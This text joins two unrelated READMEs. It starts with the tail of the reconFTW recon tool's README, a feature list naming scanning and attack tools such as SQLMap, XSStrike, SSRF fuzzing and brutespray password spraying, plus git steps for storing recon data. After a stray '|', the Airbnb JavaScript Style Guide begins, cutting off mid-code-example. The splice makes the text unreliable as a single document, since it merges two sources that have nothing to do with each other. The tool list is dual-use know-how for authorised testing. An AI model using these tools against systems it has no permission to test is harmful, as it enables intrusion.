- Certificate transparency ([ctfr](https://github.com/UnaPibaGeek/ctfr), [tls.bufferover](tls.bufferover.run) and [dns.bufferover](dns.bufferover.run)))
- Bruteforce ([puredns](https://github.com/d3mondev/puredns))
- Permutations ([DNScewl](https://github.com/codingo/DNSCewl))
- JS files & Source Code Scraping ([gospider](https://github.com/jaeles-project/gospider))
- CNAME Records ([dnsx](https://github.com/projectdiscovery/dnsx))
- Nuclei Sub TKO templates ([nuclei](https://github.com/projectdiscovery/nuclei))
- Web Prober ([httpx](https://github.com/projectdiscovery/httpx))
- Web screenshot ([gowitness](https://github.com/sensepost/gowitness))
- Web templates scanner ([nuclei](https://github.com/projectdiscovery/nuclei))
- IP and subdomains WAF checker ([cf-check](https://github.com/dwisiswant0/cf-check) and [wafw00f](https://github.com/EnableSecurity/wafw00f))
- Port Scanner (Active with [nmap](https://github.com/nmap/nmap) and passive with [shodan-cli](https://cli.shodan.io/))
- Url extraction ([waybackurls](https://github.com/tomnomnom/waybackurls), [gauplus](https://github.com/bp0lr/gauplus), [gospider](https://github.com/jaeles-project/gospider), [github-endpoints](https://gist.github.com/six2dez/d1d516b606557526e9a78d7dd49cacd3))
- Pattern Search ([gf](https://github.com/tomnomnom/gf) and [gf-patterns](https://github.com/1ndianl33t/Gf-Patterns))
- Param discovery ([paramspider](https://github.com/devanshbatham/ParamSpider) and [arjun](https://github.com/s0md3v/Arjun))
- XSS ([XSStrike](https://github.com/s0md3v/XSStrike))
- Open redirect ([Openredirex](https://github.com/devanshbatham/OpenRedireX))
- SSRF (headers [asyncio_ssrf.py](https://gist.github.com/h4ms1k/adcc340495d418fcd72ec727a116fea2) and param values with [ffuf](https://github.com/ffuf/ffuf))
- CRLF ([crlfuzz](https://github.com/dwisiswant0/crlfuzz))
- Favicon Real IP ([fav-up](https://github.com/pielco11/fav-up))
- Javascript analysis ([LinkFinder](https://github.com/GerbenJavado/LinkFinder), scripts from [JSFScan](https://github.com/KathanP19/JSFScan.sh))
- Fuzzing ([ffuf](https://github.com/ffuf/ffuf))
- Cors ([Corsy](https://github.com/s0md3v/Corsy))
- LFI Checks (manual/[ffuf](https://github.com/ffuf/ffuf))
- SQLi Check ([SQLMap](https://github.com/sqlmapproject/sqlmap))
- SSTI (manual/[ffuf](https://github.com/ffuf/ffuf))
- CMS Scanner ([CMSeeK](https://github.com/Tuhinshubhra/CMSeeK))
- SSL tests ([testssl](https://github.com/drwetter/testssl.sh))
- Multithread in some steps ([Interlace](https://github.com/codingo/Interlace))
- Broken Links Checker ([gospider](https://github.com/jaeles-project/gospider))
- S3 bucket finder ([S3Scanner](https://github.com/sa7mon/S3Scanner))
- Password spraying ([brutespray](https://github.com/x90skysn3k/brutespray))
- 4xx bypasser ([DirDar](https://github.com/M4DM0e/DirDar))
- Custom resolvers generated list ([dnsvalidator](https://github.com/vortexau/dnsvalidator))
- DNS Zone Transfer ([dnsrecon](https://github.com/darkoperator/dnsrecon))
- Docker container included and [DockerHub](https://hub.docker.com/r/six2dez/reconftw) integration
- Cloud providers check ([ip2provider](https://github.com/oldrho/ip2provider))
- Resume the scan from last performed step
- Custom output folder
- All in one installer/updater script compatible with most distros
- Diff support for continuous running (cron mode)
- Support for targets with multiple domains
- RaspberryPi/ARM support
- 5 modes (recon, passive, subdomains, web and all)
- Out of Scope Support
- Notification support for Slack, Discord and Telegram ([notify](https://github.com/projectdiscovery/notify))
# Mindmap/Workflow
![Mindmap](images/mindmap_0321.png)
## Data Keep
Follow these simple steps to end up having a private repository with your `API Keys` and `/Recon` data.
* Create a private __blank__ repository on `Git(Hub|Lab)` (Take into account size limits regarding Recon data upload)
* Clone your project: `git clone https://gitlab.com/example/reconftw-data`
* Get inside the cloned repository: `cd reconftw-data`
* Create branch with an empty commit: `git commit --allow-empty -m "Empty commit"`
* Add official repo as a new remote: `git remote add upstream https://github.com/six2dez/reconftw` (`upstream` is an example)
* Update upstream's repo: `git fetch upstream`
* Rebase current branch with the official one: `git rebase upstream/main master`
### Main commands:
* Upload changes to your personal repo: `git add . && git commit -m "Data upload" && git push origin master`
* Update tool anytime: `git fetch upstream && git rebase upstream/main master`
## How to contribute:
If you want to contribute to this project you can do it in multiple ways:
- Submitting an [issue](https://github.com/six2dez/reconftw/issues/new/choose) because you have found a bug or you have any suggestion or request.
- Making a Pull Request from [dev](https://github.com/six2dez/reconftw/tree/dev) branch because you want to improve the code or add something to the script.
## Need help?
- Take a look in the [wiki](https://github.com/six2dez/reconftw/wiki)
- Ask for help in the [Telegram group](https://t.me/joinchat/TO_R8NYFhhbmI5co)
## You can support this work buying me a coffee:
[<img src="https://cdn.buymeacoffee.com/buttons/v2/default-green.png">](https://www.buymeacoffee.com/six2dez)
# Thanks :pray:
* Thank you for lending a helping hand towards the development of the project!
- [Spyse](https://spyse.com/)
- [Networksdb](https://networksdb.io/)
- [Intelx](https://intelx.io/)
- [BinaryEdge](https://www.binaryedge.io/)
- [Censys](https://censys.io/)
- [CIRCL](https://www.circl.lu/)
- [Whoxy](https://www.whoxy.com/)
|
# Airbnb JavaScript Style Guide() {
*A mostly reasonable approach to JavaScript*
> **Note**: this guide assumes you are using [Babel](https://babeljs.io), and requires that you use [babel-preset-airbnb](https://npmjs.com/babel-preset-airbnb) or the equivalent. It also assumes you are installing shims/polyfills in your app, with [airbnb-browser-shims](https://npmjs.com/airbnb-browser-shims) or the equivalent.
[![Downloads](https://img.shields.io/npm/dm/eslint-config-airbnb.svg)](https://www.npmjs.com/package/eslint-config-airbnb)
[![Downloads](https://img.shields.io/npm/dm/eslint-config-airbnb-base.svg)](https://www.npmjs.com/package/eslint-config-airbnb-base)
[![Gitter](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/airbnb/javascript?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)
This guide is available in other languages too. See [Translation](#translation)
Other Style Guides
- [ES5 (Deprecated)](https://github.com/airbnb/javascript/tree/es5-deprecated/es5)
- [React](react/)
- [CSS-in-JavaScript](css-in-javascript/)
- [CSS & Sass](https://github.com/airbnb/css)
- [Ruby](https://github.com/airbnb/ruby)
## Table of Contents
1. [Types](#types)
1. [References](#references)
1. [Objects](#objects)
1. [Arrays](#arrays)
1. [Destructuring](#destructuring)
1. [Strings](#strings)
1. [Functions](#functions)
1. [Arrow Functions](#arrow-functions)
1. [Classes & Constructors](#classes--constructors)
1. [Modules](#modules)
1. [Iterators and Generators](#iterators-and-generators)
1. [Properties](#properties)
1. [Variables](#variables)
1. [Hoisting](#hoisting)
1. [Comparison Operators & Equality](#comparison-operators--equality)
1. [Blocks](#blocks)
1. [Control Statements](#control-statements)
1. [Comments](#comments)
1. [Whitespace](#whitespace)
1. [Commas](#commas)
1. [Semicolons](#semicolons)
1. [Type Casting & Coercion](#type-casting--coercion)
1. [Naming Conventions](#naming-conventions)
1. [Accessors](#accessors)
1. [Events](#events)
1. [jQuery](#jquery)
1. [ECMAScript 5 Compatibility](#ecmascript-5-compatibility)
1. [ECMAScript 6+ (ES 2015+) Styles](#ecmascript-6-es-2015-styles)
1. [Standard Library](#standard-library)
1. [Testing](#testing)
1. [Performance](#performance)
1. [Resources](#resources)
1. [In the Wild](#in-the-wild)
1. [Translation](#translation)
1. [The JavaScript Style Guide Guide](#the-javascript-style-guide-guide)
1. [Chat With Us About JavaScript](#chat-with-us-about-javascript)
1. [Contributors](#contributors)
1. [License](#license)
1. [Amendments](#amendments)
## Types
<a name="types--primitives"></a><a name="1.1"></a>
- [1.1](#types--primitives) **Primitives**: When you access a primitive type you work directly on its value.
- `string`
- `number`
- `boolean`
- `null`
- `undefined`
- `symbol`
- `bigint`
<br />
```javascript
const foo = 1;
let bar = foo;
bar = 9;
console.log(foo, bar); // => 1, 9
```
- Symbols and BigInts cannot be faithfully polyfilled, so they should not be used when targeting browsers/environments that don’t support them natively.
<a name="types--complex"></a><a name="1.2"></a>
- [1.2](#types--complex) **Complex**: When you access a complex type you work on a reference to its value.
- `object`
- `array`
- `function`
<br />
```javascript
const foo = [1, 2];
const bar = foo;
bar[0] = 9;
console.log(foo[0], bar[0]); // => 9, 9
```
**[⬆ back to top](#table-of-contents)**
## References
<a name="references--prefer-const"></a><a name="2.1"></a>
- [2.1](#references--prefer-const) Use `const` for all of your references; avoid using `var`. eslint: [`prefer-const`](https://eslint.org/docs/rules/prefer-const), [`no-const-assign`](https://eslint.org/docs/rules/no-const-assign)
> Why? This ensures that you can’t reassign your references, which can lead to bugs and difficult to comprehend code.
```javascript
// bad
var a = 1;
var b = 2;
// good
const a = 1;
const b = 2;
```
<a name="references--disallow-var"></a><a name="2.2"></a>
- [2.2](#references--disallow-var) If you must reassign references, use `let` instead of `var`. eslint: [`no-var`](https://eslint.org/docs/rules/no-var)
> Why? `let` is block-scoped rather than function-scoped like `var`.
```javascript
// bad
var count = 1;
if (true) {
count += 1;
}
// good, use the let.
let count = 1;
if (true) {
count += 1;
}
```
<a name="references--block-scope"></a><a name="2.3"></a>
- [2.3](#references--block-scope) Note that both `let` and `const` are block-scoped, whereas `var` is function-scoped.
```javascript
// const and let only exist in the blocks they are defined in.
{
let a = 1;
const b = 1;
var c = 1;
}
console.log(a); // ReferenceError
console.log(b); // ReferenceError
console.log(c); // Prints 1
```
In the above code, you can see that referencing `a` and `b` will produce a ReferenceError, while `c` contains the number. This is because `a` and `b` are block scoped, while `c` is scoped to the containing function.
**[⬆ back to top](#table-of-contents)**
## Objects
<a name="objects--no-new"></a><a name="3.1"></a>
- [3.1](#objects--no-new) Use the literal syntax for object creation. eslint: [`no-new-object`](https://eslint.org/docs/rules/no-new-object)
```javascript
// bad
const item = new Object();
// good
const item = {};
```
<a name="es6-computed-properties"></a><a name="3.4"></a>
- [3.2](#es6-computed-properties) Use computed property names when creating objects with dynamic property names.
> Why? They allow you to define all the properties of an object in one place.
```javascript
function getKey(k) {
return `a key named ${k}`;
}
// bad
const obj = {
id: 5,
name: 'San Francisco',
};
obj[getKey('enabled')] = true;
// good
const obj = {
id: 5,
name: 'San Francisco',
[getKey('enabled')]: true,
};
```
<a name="es6-object-shorthand"></a><a name="3.5"></a>
- [3.3](#es6-object-shorthand) Use object method shorthand. eslint: [`object-shorthand`](https://eslint.org/docs/rules/object-shorthand)
```javascript
// bad
const atom = {
value: 1,
addValue: function (value) {
return atom.value + value;
},
};
// good
const atom = {
value: 1,
addValue(value) {
return atom.value + value;
},
};
```
<a name="es6-object-concise"></a><a name="3.6"></a>
- [3.4](#es6-object-concise) Use property value shorthand. eslint: [`object-shorthand`](https://eslint.org/docs/rules/object-shorthand)
> Why? It is shorter and descriptive.
```javascript
const lukeSkywalker = 'Luke Skywalker';
// bad
const obj = {
lukeSkywalker: lukeSkywalker,
};
// good
const obj = {
lukeSkywalker,
};
```
<a name="objects--grouped-shorthand"></a><a name="3.7"></a>
- [3.5](#objects--grouped-shorthand) Group your shorthand properties at the beginning of your object declaration.
> Why? It’s easier to tell which properties are using the shorthand.
```javascript
const anakinSkywalker = 'Anakin Skywalker';
const lukeSkywalker = 'Luke Skywalker';
// bad
const obj = {
episodeOne: 1,
twoJediWalkIntoACantina: 2,
lukeSkywalker,
episodeThree: 3,
mayTheFourth: 4,
anakinSkywalker,
};
// good
const obj = {
lukeSkywalker,
anakinSkywalker,
episodeOne: 1,
twoJediWalkIntoACantina: 2,
episodeThree: 3,
mayTheFourth: 4,
};
```
<a name="objects--quoted-props"></a><a name="3.8"></a>
- [3.6](#objects--quoted-props) Only quote properties that are invalid identifiers. eslint: [`quote-props`](https://eslint.org/docs/rules/quote-props)
> Why? In general we consider it subjectively easier to read. It improves syntax highlighting, and is also more easily optimized by many JS engines.
```javascript
// bad
const bad = {
'foo': 3,
'bar': 4,
'data-blah': 5,
};
// good
const good = {
foo: 3,
bar: 4,
'data-blah': 5,
};
```
<a name="objects--prototype-builtins"></a>
- [3.7](#objects--prototype-builtins) Do not call `Object.prototype` methods directly, such as `hasOwnProperty`, `propertyIsEnumerable`, and `isPrototypeOf`. eslint: [`no-prototype-builtins`](https://eslint.org/docs/rules/no-prototype-builtins)
> Why? These methods may be shadowed by properties on the object in question - consider `{ hasOwnProperty: false }` - or, the object may be a null object (`Object.create(null)`). In modern browsers that support ES2022, or with a polyfill such as <https://npmjs.com/object.hasown>, `Object.hasOwn` can also be used as an alternative to `Object.prototype.hasOwnProperty.call`.
```javascript
// bad
console.log(object.hasOwnProperty(key));
// good
console.log(Object.prototype.hasOwnProperty.call(object, key));
// better
const has = Object.prototype.hasOwnProperty; // cache the lookup once, in module scope.
console.log(has.call(object, key));
// best
console.log(Object.hasOwn(object, key)); // only supported in browsers that support ES2022
/* or */
import has from 'has'; // https://www.npmjs.com/package/has
console.log(has(object, key));
/* or */
console.log(Object.hasOwn(object, key)); // https://www.npmjs.com/package/object.hasown
```
<a name="objects--rest-spread"></a>
- [3.8](#objects--rest-spread) Prefer the object spread syntax over [`Object.assign`](https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Objects/Object/assign) to shallow-copy objects. Use the object rest parameter syntax to get a new object with certain properties omitted. eslint: [`prefer-object-spread`](https://eslint.org/docs/rules/prefer-object-spread)
```javascript
// very bad
const original = { a: 1, b: 2 };
const copy = Object.assign(original, { c: 3 }); // this mutates `original` ಠ_ಠ
delete copy.a; // so does this
// bad
const original = { a: 1, b: 2 };
const copy = Object.assign({}, original, { c: 3 }); // copy => { a: 1, b: 2, c: 3 }
// good
const original = { a: 1, b: 2 };
const copy = { ...original, c: 3 }; // copy => { a: 1, b: 2, c: 3 }
const { a, ...noA } = copy; // noA => { b: 2, c: 3 }
```
**[⬆ back to top](#table-of-contents)**
## Arrays
<a name="arrays--literals"></a><a name="4.1"></a>
- [4.1](#arrays--literals) Use the literal syntax for array creation. eslint: [`no-array-constructor`](https://eslint.org/docs/rules/no-array-constructor)
```javascript
// bad
const items = new Array();
// good
const items = [];
```
<a name="arrays--push"></a><a name="4.2"></a>
- [4.2](#arrays--push) Use [Array#push](https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Objects/Array/push) instead of direct assignment to add items to an array.
```javascript
const someStack = [];
// bad
someStack[someStack.length] = 'abracadabra';
// good
someStack.push('abracadabra');
```
<a name="es6-array-spreads"></a><a name="4.3"></a>
- [4.3](#es6-array-spreads) Use array spreads `...` to copy arrays.
```javascript
// bad
const len = items.length;
const itemsCopy = [];
let i;
for (i = 0; i < len; i += 1) {
itemsCopy[i] = items[i];
}
// good
const itemsCopy = [...items];
```
<a name="arrays--from"></a>
<a name="arrays--from-iterable"></a><a name="4.4"></a>
- [4.4](#arrays--from-iterable) To convert an iterable object to an array, use spreads `...` instead of [`Array.from`](https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Objects/Array/from)
```javascript
const foo = document.querySelectorAll('.foo');
// good
const nodes = Array.from(foo);
// best
const nodes = [...foo];
```
<a name="arrays--from-array-like"></a>
- [4.5](#arrays--from-array-like) Use [`Array.from`](https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Objects/Array/from) for converting an array-like object to an array.
```javascript
const arrLike = { 0: 'foo', 1: 'bar', 2: 'baz', length: 3 };
// bad
const arr = Array.prototype.slice.call(arrLike);
// good
const arr = Array.from(arrLike);
```
<a name="arrays--mapping"></a>
- [4.6](#arrays--mapping) Use [`Array.from`](https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Objects/Array/from) instead of spread `...` for mapping over iterables, because it avoids creating an intermediate array.
```javascript
// bad
const baz = [...foo].map(bar);
// good
const baz = Array.from(foo, bar);
```
<a name="arrays--callback-return"></a><a name="4.5"></a>
- [4.7](#arrays--callback-return) Use return statements in array method callbacks. It’s ok to omit the return if the function body consists of a single statement returning an expression without side effects, following [8.2](#arrows--implicit-return). eslint: [`array-callback-return`](https://eslint.org/docs/rules/array-callback-return)
```javascript
// good
[1, 2, 3].map((x) => {
const y = x + 1;
return x * y;
});
// good
[1, 2, 3].map((x) => x + 1);
// bad - no returned value means `acc` becomes undefined after the first iteration
[[0, 1], [2, 3], [4, 5]].reduce((acc, item, index) => {
const flatten = acc.concat(item);
});
// good
[[0, 1], [2, 3], [4, 5]].reduce((acc, item, index) => {
const flatten = acc.concat(item);
return flatten;
});
// bad
inbox.filter((msg) => {
const { subject, author } = msg;
if (subject === 'Mockingbird') {
return author === 'Harper Lee';
} else {
return false;
}
});
// good
inbox.filter((msg) => {
const { subject, author } = msg;
if (subject === 'Mockingbird') {
return author === 'Harper Lee';
}
return false;
});
```
<a name="arrays--bracket-newline"></a>
- [4.8](#arrays--bracket-newline) Use line breaks after opening array brackets and before closing array brackets, if an array has multiple lines
```javascript
// bad
const arr = [
[0, 1], [2, 3], [4, 5],
];
const objectInArray = [{
id: 1,
}, {
id: 2,
}];
const numberInArray = [
1, 2,
];
// good
const arr = [[0, 1], [2, 3], [4, 5]];
const objectInArray = [
{
id: 1,
},
{
id: 2,
},
];
const numberInArray = [
1,
2,
];
```
**[⬆ back to top](#table-of-contents)**
## Destructuring
<a name="destructuring--object"></a><a name="5.1"></a>
- [5.1](#destructuring--object) Use object destructuring when accessing and using multiple properties of an object. eslint: [`prefer-destructuring`](https://eslint.org/docs/rules/prefer-destructuring)
> Why? Destructuring saves you from creating temporary references for those properties, and from repetitive access of the object. Repeating object access creates more repetitive code, requires more reading, and creates more opportunities for mistakes. Destructuring objects also provides a single site of definition of the object structure that is used in the block, rather than requiring reading the entire block to determine what is used.
```javascript
// bad
function getFullName(user) {
const firstName = user.firstName;
const lastName = user.lastName;
return `${firstName} ${lastName}`;
}
// good
function getFullName(user) {
const { firstName, lastName } = user;
return `${firstName} ${lastName}`;
}
// best
function getFullName({ firstName, lastName }) {
return `${firstName} ${lastName}`;
}
```
<a name="destructuring--array"></a><a name="5.2"></a>
- [5.2](#destructuring--array) Use array destructuring. eslint: [`prefer-destructuring`](https://eslint.org/docs/rules/prefer-destructuring)
```javascript
const arr = [1, 2, 3, 4];
// bad
const first = arr[0];
const second = arr[1];
// good
const [first, second] = arr;
```
<a name="destructuring--object-over-array"></a><a name="5.3"></a>
- [5.3](#destructuring--object-over-array) Use object destructuring for multiple return values, not array destructuring.
> Why? You can add new properties over time or change the order of things without breaking call sites.
```javascript
// bad
function processInput(input) {
// then a miracle occurs
return [left, right, top, bottom];
}
// the caller needs to think about the order of return data
const [left, __, top] = processInput(input);
// good
function processInput(input) {
// then a miracle occurs
return { left, right, top, bottom };
}
// the caller selects only the data they need
const { left, top } = processInput(input);
```
**[⬆ back to top](#table-of-contents)**
## Strings
<a name="strings--quotes"></a><a name="6.1"></a>
- [6.1](#strings--quotes) Use single quotes `''` for strings. eslint: [`quotes`](https://eslint.org/docs/rules/quotes)
```javascript
// bad
const name = "Capt. Janeway";
// bad - template literals should contain interpolation or newlines
const name = `Capt. Janeway`;
// good
const name = 'Capt. Janeway';
```
<a name="strings--line-length"></a><a name="6.2"></a>
- [6.2](#strings--line-length) Strings that cause the line to go over 100 characters should not be written across multiple lines using string concatenation.
> Why? Broken strings are painful to work with and make code less searchable.
```javascript
// bad
const errorMessage = 'This is a super long error that was thrown because \
of Batman. When you stop to think about how Batman had anything to do \
with this, you would get nowhere \
fast.';
// bad
const errorMessage = 'This is a super long error that was thrown because ' +
'of Batman. When you stop to think about how Batman had anything to do ' +
'with this, you would get nowhere fast.';
// good
const errorMessage = 'This is a super long error that was thrown because of Batman. When you stop to think about how Batman had anything to do with this, you would get nowhere fast.';
```
<a name="es6-template-literals"></a><a name="6.4"></a>
- [6.3](#es6-template-literals) When programmatically building up strings, use template strings instead of concatenation. eslint: [`prefer-template`](https://eslint.org/docs/rules/prefer-template) [`template-curly-spacing`](https://eslint.org/docs/rules/template-curly-spacing)
> Why? Template strings give you a readable, concise syntax with proper newlines and string interpolation features.
```javascript
// bad
function sayHi(name) {
return 'How are you, ' + name + '?';
}
// bad
function sayHi(name) {
return ['How are you, ', name, '?'].join();
}
// bad
function sayHi(name) {
return `How are you, ${ name }?`;
}
// good
function sayHi(name) {
return `How are you, ${name}?`;
}
```
<a name="strings--eval"></a><a name="6.5"></a>
- [6.4](#strings--eval) Never use `eval()` on a string; it opens too many vulnerabilities. eslint: [`no-eval`](https://eslint.org/docs/rules/no-eval)
<a name="strings--escaping"></a>
- [6.5](#strings--escaping) Do not unnecessarily escape characters in strings. eslint: [`no-useless-escape`](https://eslint.org/docs/rules/no-useless-escape)
> Why? Backslashes harm readability, thus they should only be present when necessary.
```javascript
// bad
const foo = '\'this\' \i\s \"quoted\"';
// good
const foo = '\'this\' is "quoted"';
const foo = `my name is '${name}'`;
```
**[⬆ back to top](#table-of-contents)**
## Functions
<a name="functions--declarations"></a><a name="7.1"></a>
- [7.1](#functions--declarations) Use named function expressions instead of function declarations. eslint: [`func-style`](https://eslint.org/docs/rules/func-style), [`func-names`](https://eslint.org/docs/latest/rules/func-names)
> Why? Function declarations are hoisted, which means that it’s easy - too easy - to reference the function before it is defined in the file. This harms readability and maintainability. If you find that a function’s definition is large or complex enough that it is interfering with understanding the rest of the file, then perhaps it’s time to extract it to its own module! Don’t forget to explicitly name the expression, regardless of whether or not the name is inferred from the containing variable (which is often the case in modern browsers or when using compilers such as Babel). This eliminates any assumptions made about the Error’s call stack. ([Discussion](https://github.com/airbnb/javascript/issues/794))
```javascript
// bad
function foo() {
// ...
}
// bad
const foo = function () {
// ...
};
// good
// lexical name distinguished from the variable-referenced invocation(s)
const short = function longUniqueMoreDescriptiveLexicalFoo() {
// ...
};
```
<a name="functions--iife"></a><a name="7.2"></a>
- [7.2](#functions--iife) Wrap immediately invoked function expressions in parentheses. eslint: [`wrap-iife`](https://eslint.org/docs/rules/wrap-iife)
> Why? An immediately invoked function expression is a single unit - wrapping both it, and its invocation parens, in parens, cleanly expresses this. Note that in a world with modules everywhere, you almost never need an IIFE.
```javascript
// immediately-invoked function expression (IIFE)
(function () {
console.log('Welcome to the Internet. Please follow me.');
}());
```
<a name="functions--in-blocks"></a><a name="7.3"></a>
- [7.3](#functions--in-blocks) Never declare a function in a non-function block (`if`, `while`, etc). Assign the function to a variable instead. Browsers will allow you to do it, but they all interpret it differently, which is bad news bears. eslint: [`no-loop-func`](https://eslint.org/docs/rules/no-loop-func)
<a name="functions--note-on-blocks"></a><a name="7.4"></a>
- [7.4](#functions--note-on-blocks) **Note:** ECMA-262 defines a `block` as a list of statements. A function declaration is not a statement.
```javascript
// bad
if (currentUser) {
function test() {
console.log('Nope.');
}
}
// good
let test;
if (currentUser) {
test = () => {
console.log('Yup.');
};
}
```
<a name="functions--arguments-shadow"></a><a name="7.5"></a>
- [7.5](#functions--arguments-shadow) Never name a parameter `arguments`. This will take precedence over the `arguments` object that is given to every function scope.
```javascript
// bad
function foo(name, options, arguments) {
// ...
}
// good
function foo(name, options, args) {
// ...
}
```
<a name="es6-rest"></a><a name="7.6"></a>
- [7.6](#es6-rest) Never use `arguments`, opt to use rest syntax `...` instead. eslint: [`prefer-rest-params`](https://eslint.org/docs/rules/prefer-rest-params)
> Why? `...` is explicit about which arguments you want pulled. Plus, rest arguments are a real Array, and not merely Array-like like `arguments`.
```javascript
// bad
function concatenateAll() {
const args = Array.prototype.slice.call(arguments);
return args.join('');
}
// good
function concatenateAll(...args) {
return args.join('');
}
```
<a name="es6-default-parameters"></a><a name="7.7"></a>
- [7.7](#es6-default-parameters) Use default parameter syntax rather than mutating function arguments.
```javascript
// really bad
function handleThings(opts) {
// No! We shouldn’t mutate function arguments.
// Double bad: if opts is falsy it'll be set to an object which may
// be what you want but it can introduce subtle bugs.
opts = opts || {};
// ...
}
// still bad
function handleThings(opts) {
if (opts === void 0) {
opts = {};
}
// ...
}
// good
function handleThings(opts = {}) {
// ...
}
```
<a name="functions--default-side-effects"></a><a name="7.8"></a>
- [7.8](#functions--default-side-effects) Avoid side effects with default parameters.
> Why? They are confusing to reason about.
```javascript
let b = 1;
// bad
function count(a = b++) {
console.log(a);
}
count(); // 1
count(); // 2
count(3); // 3
count(); // 3
```
<a name="functions--defaults-last"></a><a name="7.9"></a>
- [7.9](#functions--defaults-last) Always put default parameters last. eslint: [`default-param-last`](https://eslint.org/docs/rules/default-param-last)
```javascript
// bad
function handleThings(opts = {}, name) {
// ...
}
// good
function handleThings(name, opts = {}) {
// ...
}
```
<a name="functions--constructor"></a><a name="7.10"></a>
- [7.10](#functions--constructor) Never use the Function constructor to create a new function. eslint: [`no-new-func`](https://eslint.org/docs/rules/no-new-func)
> Why? Creating a function in this way evaluates a string similarly to `eval()`, which opens vulnerabilities.
```javascript
// bad
const add = new Function('a', 'b', 'return a + b');
// still bad
const subtract = Function('a', 'b', 'return a - b');
```
<a name="functions--signature-spacing"></a><a name="7.11"></a>
- [7.11](#functions--signature-spacing) Spacing in a function signature. eslint: [`space-before-function-paren`](https://eslint.org/docs/rules/space-before-function-paren) [`space-before-blocks`](https://eslint.org/docs/rules/space-before-blocks)
> Why? Consistency is good, and you shouldn’t have to add or remove a space when adding or removing a name.
```javascript
// bad
const f = function(){};
const g = function (){};
const h = function() {};
// good
const x = function () {};
const y = function a() {};
```
<a name="functions--mutate-params"></a><a name="7.12"></a>
- [7.12](#functions--mutate-params) Never mutate parameters. eslint: [`no-param-reassign`](https://eslint.org/docs/rules/no-param-reassign)
> Why? Manipulating objects passed in as parameters can cause unwanted variable side effects in the original caller.
```javascript
// bad
function f1(obj) {
obj.key = 1;
}
// good
function f2(obj) {
const key = Object.prototype.hasOwnProperty.call(obj, 'key') ? obj.key : 1;
}
```
<a name="functions--reassign-params"></a><a name="7.13"></a>
- [7.13](#functions--reassign-params) Never reassign parameters. eslint: [`no-param-reassign`](https://eslint.org/docs/rules/no-param-reassign)
> Why? Reassigning parameters can lead to unexpected behavior, especially when accessing the `arguments` object. It can also cause optimization issues, especially in V8.
```javascript
// bad
function f1(a) {
a = 1;
// ...
}
function f2(a) {
if (!a) { a = 1; }
// ...
}
// good
function f3(a) {
const b = a || 1;
// ...
}
function f4(a = 1) {
// ...
}
```
<a name="functions--spread-vs-apply"></a><a name="7.14"></a>
- [7.14](#functions--spread-vs-apply) Prefer the use of the spread syntax `...` to call variadic functions. eslint: [`prefer-spread`](https://eslint.org/docs/rules/prefer-spread)
> Why? It’s cleaner, you don’t need to supply a context, and you can not easily compose `new` with `apply`.
```javascript
// bad
const x = [1, 2, 3, 4, 5];
console.log.apply(console, x);
// good
const x = [1, 2, 3, 4, 5];
console.log(...x);
// bad
new (Function.prototype.bind.apply(Date, [null, 2016, 8, 5]));
// good
new Date(...[2016, 8, 5]);
```
<a name="functions--signature-invocation-indentation"></a>
- [7.15](#functions--signature-invocation-indentation) Functions with multiline signatures, or invocations, should be indented just like every other multiline list in this guide: with each item on a line by itself, with a trailing comma on the last item. eslint: [`function-paren-newline`](https://eslint.org/docs/rules/function-paren-newline)
```javascript
// bad
function foo(bar,
baz,
quux) {
// ...
}
// good
function foo(
bar,
baz,
quux,
) {
// ...
}
// bad
console.log(foo,
bar,
baz);
// good
console.log(
foo,
bar,
baz,
);
```
**[⬆ back to top](#table-of-contents)**
## Arrow Functions
<a name="arrows--use-them"></a><a name="8.1"></a>
- [8.1](#arrows--use-them) When you must use an anonymous function (as when passing an inline callback), use arrow function notation. eslint: [`prefer-arrow-callback`](https://eslint.org/docs/rules/prefer-arrow-callback), [`arrow-spacing`](https://eslint.org/docs/rules/arrow-spacing)
> Why? It creates a version of the function that executes in the context of `this`, which is usually what you want, and is a more concise syntax.
> Why not? If you have a fairly complicated function, you might move that logic out into its own named function expression.
```javascript
// bad
[1, 2, 3].map(function (x) {
const y = x + 1;
return x * y;
});
// good
[1, 2, 3].map((x) => {
const y = x + 1;
return x * y;
});
```
<a name="arrows--implicit-return"></a><a name="8.2"></a>
- [8.2](#arrows--implicit-return) If the function body consists of a single statement returning an [expression](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Expressions_and_Operators#Expressions) without side effects, omit the braces and use the implicit return. Otherwise, keep the braces and use a `return` statement. eslint: [`arrow-parens`](https://eslint.org/docs/rules/arrow-parens), [`arrow-body-style`](https://eslint.org/docs/rules/arrow-body-style)
> Why? Syntactic sugar. It reads well when multiple functions are chained together.
```javascript
// bad
[1, 2, 3].map((number) => {
const nextNumber = number + 1;
`A string containing the ${nextNumber}.`;
});
// good
[1, 2, 3].map((number) => `A string containing the ${number + 1}.`);
// good
[1, 2, 3].map((number) => {
const nextNumber = number + 1;
return `A string containing the ${nextNumber}.`;
});
// good
[1, 2, 3].map((number, index) => ({
[index]: number,
}));
// No implicit return with side effects
function foo(callback) {
const val = callback();
if (val === true) {
// Do something if callback returns true
}
}
let bool = false;
// bad
foo(() => bool = true);
// good
foo(() => {
bool = true;
});
```
<a name="arrows--paren-wrap"></a><a name="8.3"></a>
- [8.3](#arrows--paren-wrap) In case the expression spans over multiple lines, wrap it in parentheses for better readability.
> Why? It shows clearly where the function starts and ends.
```javascript
// bad
['get', 'post', 'put'].map((httpMethod) => Object.prototype.hasOwnProperty.call(
httpMagicObjectWithAVeryLongName,
httpMethod,
)
);
// good
['get', 'post', 'put'].map((httpMethod) => (
Object.prototype.hasOwnProperty.call(
httpMagicObjectWithAVeryLongName,
httpMethod,
)
));
```
<a name="arrows--one-arg-parens"></a><a name="8.4"></a>
- [8.4](#arrows--one-arg-parens) Always include parentheses around arguments for clarity and consistency. eslint: [`arrow-parens`](https://eslint.org/docs/rules/arrow-parens)
> Why? Minimizes diff churn when adding or removing arguments.
```javascript
// bad
[1, 2, 3].map(x => x * x);
// good
[1, 2, 3].map((x) => x * x);
// bad
[1, 2, 3].map(number => (
`A long string with the ${number}. It’s so long that we don’t want it to take up space on the .map line!`
));
// good
[1, 2, 3].map((number) => (
